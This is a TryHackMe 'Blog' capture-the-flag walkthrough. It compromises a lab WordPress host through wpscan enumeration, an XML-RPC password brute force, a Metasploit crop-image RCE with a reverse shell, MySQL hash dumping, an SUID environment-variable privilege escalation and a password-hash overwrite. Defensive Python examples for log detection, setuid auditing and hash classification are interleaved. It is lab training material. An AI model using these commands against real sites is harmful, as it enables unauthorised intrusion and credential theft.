TryHackMe Blog Writeup
Discover the foundational aspects of cybersecurity with the Blog Capture The Flag (CTF) challenge, a medium-level exercise. This concise write-up provides clear insights into essential WordPress concepts, presented with simplicity and clarity.
https://tryhackme.com/r/room/blog
Add Hosts
Edit the /etc/hosts file and add the following entries:
10.10.100.29 blog.thm
Script to add hosts automatically
ip="10.10.100.29"; domain="blog.thm"
grep -qF "$ip $domain" /etc/hosts || printf '%s %s\n' "$ip" "$domain" | sudo tee -a /etc/hosts
Gather Information From WordPress
wpscan -e u --url "http://blog.thm/"
- -e = enumerate
- u = usernames
Result
- users = bjoel, kwheel
- theme = twentytwenty
Brute-Force WordPress
wpscan --url "http://blog.thm/" --usernames bjoel,kwheel --passwords /usr/share/dict/rockyou.txt --password-attack xmlrpc --max-threads 20
Result
- kwheel:cutiepie1
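Both wpscan steps above leave a distinctive trail in the web server's access log: the `?author=N` redirects and `/wp-json/wp/v2/users` requests that reveal logins, followed by a burst of `POST /xmlrpc.php` requests carrying the password guesses. The following detection script is an added example, not part of the write-up or of WPScan; it parses combined-format log lines (the sample lines, IPs and timestamps are constructed) and reports the three behaviours per source IP.

```python
"""Flag WordPress user enumeration and XML-RPC password guessing in web server access logs."""
import re
from collections import Counter, defaultdict

# Combined log format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"'
)

# Two ways usernames leak: /?author=N redirects to /author/<login>/, and the REST users endpoint.
ENUM_RE = re.compile(r'[?&]author=\d+|^/wp-json/wp/v2/users')


def parse(line):
    """Return the named fields of one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(lines, xmlrpc_threshold=5):
    """Return per-IP findings for the behaviours the wpscan run above produces."""
    enum_hits = defaultdict(list)
    xmlrpc_posts = Counter()
    scanner_ips = set()
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if ENUM_RE.search(rec['path']):
            enum_hits[rec['ip']].append(rec['path'])
        # Failed XML-RPC logins still return HTTP 200 (the fault is in the body),
        # so count POSTs rather than status codes. One system.multicall body can
        # carry many guesses, which is why the threshold is deliberately low.
        if rec['method'] == 'POST' and rec['path'].split('?', 1)[0] == '/xmlrpc.php':
            xmlrpc_posts[rec['ip']] += 1
        # Default scanner User-Agent; easily changed, so treat it as a bonus indicator only.
        if 'wpscan' in rec['agent'].lower():
            scanner_ips.add(rec['ip'])
    return {
        'enumeration': dict(enum_hits),
        'xmlrpc_bruteforce': {ip: n for ip, n in xmlrpc_posts.items() if n >= xmlrpc_threshold},
        'scanner_agent': scanner_ips,
    }


# Constructed sample log: 10.0.0.5 mimics the scan above, 192.168.1.20 is ordinary traffic.
UA_SCAN = 'WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)'
UA_USER = 'Mozilla/5.0'
SAMPLE_LOG = [
    f'10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "{UA_SCAN}"',
    f'10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-json/wp/v2/users/?per_page=100 HTTP/1.1" 200 512 "-" "{UA_SCAN}"',
] + [
    f'10.0.0.5 - - [01/Jan/2024:10:00:{3 + i:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 417 "-" "{UA_SCAN}"'
    for i in range(6)
] + [
    f'192.168.1.20 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 8192 "-" "{UA_USER}"',
    f'192.168.1.20 - - [01/Jan/2024:10:00:10 +0000] "POST /xmlrpc.php HTTP/1.1" 200 417 "-" "{UA_USER}"',
]

if __name__ == '__main__':
    for kind, hits in analyze(SAMPLE_LOG).items():
        print(kind, hits)
```

The single legitimate pingback from 192.168.1.20 stays below the threshold, while the scanner's six POSTs trip it. On a real site, disabling XML-RPC when nothing needs it (or rate-limiting it at the web server) removes this brute-force channel entirely.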
Exploit to Gain Access
msfconsole
use multi/http/wp_crop_rce
set password cutiepie1
set username kwheel
set rhosts blog.thm
set THEME_DIR twentytwenty
set lhost tun0
exploit
shell
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal type:
export TERM=xterm
Extract Password Hash From MySQL
cat wp-config.php
mysql -u wordpressuser -p
show databases;
use blog;
show tables;
select * from wp_users;
exit
Privilege Escalation
Find SUID binaries:
find / -type f -perm -u=s 2>/dev/null
Result
- vulnerable = /usr/sbin/checker
ltrace /usr/sbin/checker
Result
- env(admin)
This means the program reads the admin environment variable and bases its decision on it. An environment variable is entirely under the caller's control, so a setuid program must never use one for authorization.
Now simply run it with the admin variable set:
admin=1 /usr/sbin/checker;/usr/sbin/checker
whoami
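The `find` command above is exactly what a defender should run on a schedule: a setuid binary such as /usr/sbin/checker that appears in no distribution package is the thing to catch. The script below is an added example, not part of the write-up; it inventories setuid/setgid regular files under a root, compares the result with an approved baseline, and exercises itself on a constructed temporary directory (file names `bin/ok_tool`, `bin/checker`, `bin/retired` are made up for the demo).

```python
"""Inventory setuid/setgid binaries and diff them against an approved baseline."""
import os
import stat
import tempfile


def find_setuid_setgid(root):
    """Return {relative_path: permission_bits} for regular files under root with setuid or setgid set.

    Equivalent to the write-up's `find / -type f -perm -u=s`, extended to setgid. Entries are
    examined with lstat and symlinks are never followed, so a link cannot make a file count twice.
    """
    found = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort the sweep
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found[os.path.relpath(path, root)] = stat.S_IMODE(st.st_mode)
    return found


def diff_against_baseline(current, baseline):
    """Compare a fresh inventory with the approved one.

    Returns (unexpected, missing, changed): newly privileged files (the interesting case),
    approved files that lost the bit, and files whose permission bits differ from the baseline.
    """
    unexpected = sorted(p for p in current if p not in baseline)
    missing = sorted(p for p in baseline if p not in current)
    changed = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return unexpected, missing, changed


def demo():
    """Constructed tree: one approved setuid file, one rogue one, one that lost its bit."""
    with tempfile.TemporaryDirectory() as root:
        bin_dir = os.path.join(root, 'bin')
        os.mkdir(bin_dir)
        for name, mode in (('ok_tool', 0o4755), ('checker', 0o4755), ('retired', 0o755)):
            path = os.path.join(bin_dir, name)
            with open(path, 'wb') as f:
                f.write(b'#!/bin/sh\nexit 0\n')
            os.chmod(path, mode)
        # A symlink to the rogue file must not produce a second finding.
        os.symlink(os.path.join(bin_dir, 'checker'), os.path.join(bin_dir, 'checker_link'))
        baseline = {'bin/ok_tool': 0o4755, 'bin/retired': 0o4755}
        return diff_against_baseline(find_setuid_setgid(root), baseline)


if __name__ == '__main__':
    unexpected, missing, changed = demo()
    print('unexpected setuid/setgid files:', unexpected)
    print('approved files that lost the bit:', missing)
    print('permission bits changed:', changed)
```

Run against `/` as root, with the baseline taken from a freshly installed host of the same image, the `unexpected` list is the review queue; a hit like /usr/sbin/checker that trusts an environment variable is then a matter of removing the bit or the binary.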
Optional
WordPress Password Hash Generator
Generate a hash with a WordPress password hash generator; I used the password "password".
mysql -u wordpressuser -p
show databases;
use blog;
show tables;
select * from wp_users;
UPDATE wp_users SET user_pass = "$P$Bq7XDB8Xb/jjexb8e4CIiDw38/2HyO." WHERE user_nicename="bjoel";
select * from wp_users;
exit
Now you can log in at http://blog.thm/wp-login.php with bjoel:password.
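The `$P$` value written into wp_users above, like the hashes read out in the MySQL section earlier, is a phpass "portable" hash: the `$P$` tag, one character giving log2 of the MD5 iteration count (`B` = 13, so 8192 rounds), an 8-character salt, then 22 characters of phpass's own base64 alphabet. Knowing the layout lets you audit a users table for accounts still on this salted-MD5 scheme and verify a hash without the web application. The code below is an added example, not part of the write-up or of WordPress; it reimplements the public phpass algorithm in Python, and the `wp_users` rows it classifies are constructed.

```python
"""Parse, verify and classify WordPress (phpass portable) password hashes."""
import hashlib
import hmac
import re

ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'


def _encode64(data, count):
    """phpass's base64 variant (not RFC 4648): 6-bit groups, bytes packed little-endian."""
    out, i = [], 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)


def parse_setting(stored):
    """Return (cost_log2, salt) for a $P$/$H$ hash, or None if it is not a portable hash."""
    if len(stored) != 34 or stored[:3] not in ('$P$', '$H$'):
        return None
    cost_log2 = ITOA64.find(stored[3])
    if not 7 <= cost_log2 <= 30:
        return None
    return cost_log2, stored[4:12]


def phpass_hash(password, salt, cost_log2=13, prefix='$P$'):
    """Compute the portable hash: md5(salt+pw), then 2^cost_log2 rounds of md5(digest+pw)."""
    if len(salt) != 8 or not 7 <= cost_log2 <= 30:
        raise ValueError('salt must be 8 characters and cost_log2 in 7..30')
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << cost_log2):
        digest = hashlib.md5(digest + pw).digest()
    return prefix + ITOA64[cost_log2] + salt + _encode64(digest, 16)


def verify(password, stored):
    """Constant-time comparison of a candidate password against a stored portable hash."""
    parsed = parse_setting(stored)
    if parsed is None:
        return False
    cost_log2, salt = parsed
    return hmac.compare_digest(phpass_hash(password, salt, cost_log2, stored[:3]), stored)


def scheme(stored):
    """Name the scheme behind a wp_users.user_pass value, for migration audits."""
    if parse_setting(stored) is not None:
        return 'phpass-portable'
    if stored.startswith(('$2y$', '$2a$', '$2b$')):
        return 'bcrypt'
    if re.fullmatch(r'[0-9a-f]{32}', stored):
        return 'md5-legacy'  # unsalted MD5 from very old WordPress installs
    return 'unknown'


# Constructed rows in the shape of `select user_login, user_pass from wp_users`.
SAMPLE_ROWS = [
    ('bjoel', '$P$Bq7XDB8Xb/jjexb8e4CIiDw38/2HyO.'),
    ('kwheel', '$2y$10$' + 'x' * 53),
    ('legacy', '5f4dcc3b5aa765d61d8327deb882cf99'),
]

if __name__ == '__main__':
    for login, user_pass in SAMPLE_ROWS:
        print(login, scheme(user_pass))
```

Every account reported as `phpass-portable` or `md5-legacy` should be forced through a password change once the site's hashing is upgraded, because salted MD5 at 8192 rounds offers little resistance to offline guessing.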
Finally
cat /root/root.txt
cat /media/usb/user.txt